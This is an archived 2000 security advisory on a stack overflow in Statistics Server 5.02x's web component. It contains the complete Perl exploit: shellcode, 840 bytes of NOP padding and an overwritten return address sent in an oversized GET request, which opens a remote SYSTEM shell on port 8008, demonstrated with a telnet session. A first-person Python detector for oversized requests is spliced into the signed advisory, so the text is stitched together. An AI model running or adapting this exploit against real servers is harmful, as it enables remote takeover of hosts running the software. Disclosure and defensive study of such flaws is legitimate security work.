ssexploit502x.pl

13 Aug 2000 00:00:00 - Reported by nemo - Type: packetstorm - Source: packetstormsecurity.com

Statistics Server 5.02x allows arbitrary code execution via a stack overflow in its web component.

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
  
Statistics Server 5.02x overflow  
  
Advisory Name: Statistics Server Live Stats  
Advisory Released: [00/08/10]  
Application: Web site traffic analyzer  
Severity: local/remote user can run arbitrary  
code with WebServer privileges  
Status: vendor contacted  
Authors: Nemo - [email protected]  
|Zan - [email protected]  
WWW: http://www.deepzone.org  
http://deepzone.cjb.net  
  
  
___________________________________________________________________  
  
  
OVERVIEW  
  
'Statistics Server is far more than just another log analyzer. It  
analyzes Web site traffic in "Real-time" and generates "Live Stats"  
reports in an easy to use Web interface.'  
  
'The ability of Statistics Server to deliver Live Web statistics for  
high volume installations has made it an essential component of  
many corporate Internet and Intranet Web sites and ISP Web hosting  
installations.'  
  
___________________________________________________________________  
  
BACKGROUND  
  
Statistics Server 5.02x ships with a stack overflow in its web  
component that lets a local or remote user run arbitrary code inside it.  
  
Tests, ideas and exploits were run against the Spanish versions of  
Win2k and WinNT 4.0 SP6a.  
  
The web server runs as a system service in a default installation.  
  
___________________________________________________________________  
  
DETAILS  
  
The web server does not handle long requests correctly: when a long GET  
request (about 2033 bytes) is made, it crashes with EIP overwritten.  
  
This allows arbitrary code to run with the web server's privileges  
(system privileges by default).  
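A defender-side check for the condition described above, added here as an example and not taken from the advisory: it inspects the request line of one raw HTTP request and flags the shape of the oversized GET, namely a request-target far longer than any legitimate URL, non-printable bytes and long runs of a single byte inside it. The 1024-byte and 64-byte thresholds and the two sample requests are my own constructions.

```python
# Threshold chosen for this example; the advisory reports that a GET of
# roughly 2033 bytes overwrites EIP, so alert well before that size.
MAX_TARGET_LEN = 1024
MAX_RUN = 64  # a run of identical bytes this long looks like padding, not a URL


def longest_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte value in data."""
    best = cur = 0
    prev = None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best


def analyze_request(raw: bytes) -> dict:
    """Inspect the request line of one raw HTTP request and return a verdict."""
    line = raw.split(b"\n", 1)[0].rstrip(b"\r")
    parts = line.split(b" ")
    if len(parts) < 2 or not parts[0].isalpha():
        return {"suspicious": True, "target_len": 0, "reasons": ["malformed request line"]}
    target = parts[1]
    reasons = []
    if len(target) > MAX_TARGET_LEN:
        reasons.append("request-target length %d exceeds %d" % (len(target), MAX_TARGET_LEN))
    # Only visible ASCII (0x21..0x7e) is legitimate in an unencoded request-target.
    nonprint = sum(1 for b in target if not 0x21 <= b <= 0x7e)
    if nonprint:
        reasons.append("%d non-printable bytes in request-target" % nonprint)
    run = longest_run(target)
    if run >= MAX_RUN:
        reasons.append("run of %d identical bytes in request-target" % run)
    if len(parts) < 3:
        reasons.append("no HTTP version on request line")
    return {"suspicious": bool(reasons), "target_len": len(target), "reasons": reasons}


# Constructed samples: a normal request and one shaped like the advisory's
# oversized GET (filler bytes only, no payload).
BENIGN = b"GET /reports/live.html?site=1 HTTP/1.0\r\nHost: stats.example.com\r\n\r\n"
OVERSIZED = b"GET http://O" + b"A" * 1200 + b"\x90" * 840 + b"\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("oversized", OVERSIZED)):
        verdict = analyze_request(req)
        print(name, "suspicious" if verdict["suspicious"] else "ok", verdict["reasons"])
```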
  
  
___________________________________________________________________  
  
EXPLOIT  
  
The exploit spawns a remote Windows shell on port 8008. It does not  
kill the web server, which keeps running while the attack is carried  
out and works normally afterwards.  
  
ex.  
  
$ lynx http://vulnerable.com  
  
Server Selection  
Please Enter Server ID _____________ GO  
  
....  
  
  
$ ./ssexploit502x.pl vulnerable.com 80  
  
  
(c) Deep Zone - Statistics Server 5.02x's exploit  
  
Coded by |Zan - [email protected]  
  
-=[ http://www.deepzone.org - http://deepzone.cjb.net ]=-  
  
  
spawning remote shell on port 8008 ...  
  
HTTP/1.0 302  
Server: Statistics Server 5.0  
Location: /_XXXXXXXXX_http://XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
  
... ... ... ... ... ... ...  
  
Content-Type: text/html  
Connection: Keep-Alive  
Content-Lenght: 0  
  
... done.  
  
$ lynx http://vulnerable.com (It continues working }:)  
  
Server Selection  
Please Enter Server ID _____________ GO  
  
....  
  
$ telnet vulnerable.com 8008  
  
Trying vulnerable.com...  
Connected to vulnerable.com.  
Escape character is '^]'.  
  
Microsoft Windows 2000 [Version 5.00.2195]  
(C) Copyright 1985-1999 Microsoft Corp.  
  
D:\StatisticsServer>  
  
  
___________________________________________________________________  
  
FIXES/PATCHES  
  
We contacted Statistics Server support in http://www.mediahouse.com  
six weeks ago.  
  
Firstly they told us that the new release didn't contain any bof bug.  
When we sent a DoS source they told us that the new release could have  
some problem and that it would be fixed in the next release, and that  
we would be kept updated on the fix progress.  
  
We weren't contacted again. Any news about mediahouse.com?  
  
Two days ago we emailed them again asking about patches, fixes  
and progress. We haven't had any reply.  
  
___________________________________________________________________  
  
  
EXPLOIT SOURCE  
  
The bug was discovered by Nemo - [email protected] while auditing a  
very important Spanish ISP (others are affected).  
  
The bug was exploited by |Zan - [email protected]  
  
The exploit works against Win2k/Statistics Server 5.02x running as a  
service.  
  
  
  
#!/usr/bin/perl -w  
# Statistics Server 5.02x's exploit.  
# usage: ./ssexploit502x.pl hostname port  
# 00/08/10  
# http://www.deepzone.org  
# http://deepzone.cjb.net  
# http://mareasvivas.cjb.net (|Zan homepage)  
#  
# --|Zan <[email protected]>  
# ----------------------------------------------------------------  
#  
# This exploit works against Statistics Server 5.02x/Win2k.  
#  
# Tested with Win2k (spanish version).  
#  
# It spawns a remote winshell on 8008 port. It doesn't kill  
# webserver so webserver continues running while hack is made.  
# When hack is finished webserver will run perfectly too.  
#  
# Default installation gives us a remote shell with system  
# privileges.  
#  
# overflow discovered by  
# -- Nemo <[email protected]>  
#  
# exploit coded by  
# -- |Zan <[email protected]>  
#  
# ----------------------------------------------------------------  
  
use IO::Socket;  
  
  
@crash = (  
"\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41",  
"\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f",  
"\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04",  
"\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e",  
"\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32",  
"\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99",  
"\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c",  
"\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9",  
"\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71",  
"\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9",  
"\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93",  
"\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99",  
"\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99",  
"\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14",  
"\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17",  
"\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d",  
"\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99",  
"\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66",  
"\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d",  
"\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7",  
"\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9",  
"\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9",  
"\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3",  
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a",  
"\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14",  
"\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87",  
"\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9",  
"\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32",  
"\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99",  
"\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98",  
"\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf",  
"\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99",  
"\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3",  
"\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3",  
"\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99",  
"\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99",  
"\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13",  
"\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9",  
"\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2",  
"\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf",  
"\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a",  
"\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c",  
"\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d",  
"\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9",  
"\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa",  
"\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",  
"\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99",  
"\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3",  
"\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4",  
"\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07",  
"\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c",  
"\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03",  
"\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a",  
"\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b",  
"\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07",  
"\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97",  
"\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9",  
"\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c",  
"\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9",  
"\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99",  
"\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9",  
"\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66",  
"\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d",  
"\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d",  
"\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",  
"\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99",  
"\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",  
"\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb",  
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a",  
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",  
"\x99","\xaa","\x50","\xa0","\x14","\x07","\x8d","\xd9","\x99",  
"\x96","\x1e","\xfe","\x66","\x66","\x66","\xf3","\x99","\xf1",  
"\x99","\xb9","\x99","\x99","\x09","\x14","\x2c","\x13","\x8d",  
"\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",  
"\x99","\x34","\xc9","\x66","\x0c","\xf0","\x8a","\xd9","\x99",  
"\x10","\x1c","\x03","\x8d","\xd9","\x99","\xf3","\x99","\x14",  
"\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x14","\x2c",  
"\x13","\x8d","\xd9","\x99","\x34","\xc9","\x14","\x2c","\xbf",  
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3f","\x8a",  
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",  
"\x99","\xf3","\x99","\x12","\x1c","\x03","\x8d","\xd9","\x99",  
"\x14","\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x12",  
"\x1c","\x13","\x8d","\xd9","\x99","\xc9","\x14","\x2c","\xbb",  
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3b","\x8a",  
"\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",  
"\x99","\x70","\x90","\x67","\x66","\x66","\x14","\x2c","\x0b",  
"\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\xf4","\x8a",  
"\xd9","\x99","\x14","\x2c","\x0f","\x8d","\xd9","\x99","\x34",  
"\xc9","\x66","\x0c","\xf4","\x8a","\xd9","\x99","\xf3","\x99",  
"\x66","\x0c","\x2b","\x8a","\xd9","\x99","\xc8","\xcf","\xf1",  
"\x6d","\x39","\xdc","\x99","\xc3","\x66","\x8b","\xc9","\xc2",  
"\xc0","\xce","\xc7","\xc8","\xcf","\xca","\xf1","\xe5","\x38",  
"\xdc","\x99","\xc3","\x66","\x8b","\xc9","\x35","\x1d","\x59",  
"\xec","\x62","\xc1","\x32","\xc0","\x7b","\x73","\x5a","\xce",  
"\xca","\xd6","\xda","\xd2","\xaa","\xab","\x99","\xea","\xf6",  
"\xfa","\xf2","\xfc","\xed","\x99","\xfb","\xf0","\xf7","\xfd",  
"\x99","\xf5","\xf0","\xea","\xed","\xfc","\xf7","\x99","\xf8",  
"\xfa","\xfa","\xfc","\xe9","\xed","\x99","\xea","\xfc","\xf7",  
"\xfd","\x99","\xeb","\xfc","\xfa","\xef","\x99","\xfa","\xf5",  
"\xf6","\xea","\xfc","\xea","\xf6","\xfa","\xf2","\xfc","\xed",  
"\x99","\xd2","\xdc","\xcb","\xd7","\xdc","\xd5","\xaa","\xab",  
"\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xf0",  
"\xe9","\xfc","\x99","\xde","\xfc","\xed","\xca","\xed","\xf8",  
"\xeb","\xed","\xec","\xe9","\xd0","\xf7","\xff","\xf6","\xd8",  
"\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xeb",  
"\xf6","\xfa","\xfc","\xea","\xea","\xd8","\x99","\xc9","\xfc",  
"\xfc","\xf2","\xd7","\xf8","\xf4","\xfc","\xfd","\xc9","\xf0",  
"\xe9","\xfc","\x99","\xde","\xf5","\xf6","\xfb","\xf8","\xf5",  
"\xd8","\xf5","\xf5","\xf6","\xfa","\x99","\xcb","\xfc","\xf8",  
"\xfd","\xdf","\xf0","\xf5","\xfc","\x99","\xce","\xeb","\xf0",  
"\xed","\xfc","\xdf","\xf0","\xf5","\xfc","\x99","\xca","\xf5",  
"\xfc","\xfc","\xe9","\x99","\xda","\xf5","\xf6","\xea","\xfc",  
"\xd1","\xf8","\xf7","\xfd","\xf5","\xfc","\x99","\xdc","\xe1",  
"\xf0","\xed","\xcd","\xf1","\xeb","\xfc","\xf8","\xfd","\x99",  
"\x9b","\x99","\x86","\xd1","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x95","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x98","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\xda","\xd4","\xdd","\xb7","\xdc","\xc1","\xdc",  
"\x99","\x99","\x99","\x99","\x99","\x89","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",  
"\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x90","\x90");  
  
  
# ----------------------------------------------------------------  
  
  
sub pcommands  
{  
die "usage: $0 hostname port\n" if (@ARGV != 2);  
($host) = shift @ARGV;  
($port) = shift @ARGV;  
}  
  
sub show_credits  
{  
print "\n\n\t (c) 2000 Deep Zone - Statistics Server 5.02x's exploit\n\n";  
print "\t\t Coded by |Zan - izan\@deepzone.org\n";  
print "\n\t-=[ http://www.deepzone.org - http://deepzone.cjb.net ]=-\n\n";  
}  
  
sub bofit  
{  
  
print "\nspawning remote shell on port 8008 ...\n\n";  
  
# connect to the target web server  
$s = IO::Socket::INET->new(PeerAddr=>$host,  
PeerPort=>$port,  
Proto=>"tcp");  
  
if(!$s) { die "error.\n"; }   
  
# request line; the oversized request-target starts here  
print $s "GET http://O";  
  
# payload bytes  
foreach $item (@crash) {  
print $s $item  
}  
  
# 840 bytes of padding  
for ($cont=0; $cont<840;$cont++) {  
print $s "\x90"  
}  
  
# value that ends up in EIP when the stack buffer overflows  
print $s "\x8c\x3e\x1d\x01";  
  
# end of request  
print $s "\r\n\r\n";  
  
# echo whatever the server sends back  
while (<$s>) { print }  
  
print "... done.\n\n";  
  
}  
  
# ----- begin  
  
show_credits;  
pcommands;  
bofit;  
  
# ----- that's all :)  
  
  
___________________________________________________________________  
  
GREETINGS  
  
Attrition, beavuh, ADM, Technotronic, b0f .... and of course ....  
  
RFP and Wiretrip  
  
  
-- ] EOF  
  
--  
|Zan / DeepZone (tm) - Digital Security Center  
http://www.deepzone.org - http://mareasvivas.cjb.net  
  
PGP key fingerprint:  
AD 97 A6 AB DC BB D2 CF 89 AE 0A 88 7E 5D 9D 97 BB F6 B0 B8  
  
--=[ ... a whole life searching for answers ... and when you finally  
find them ... the questions change ]=--  
  
  
`
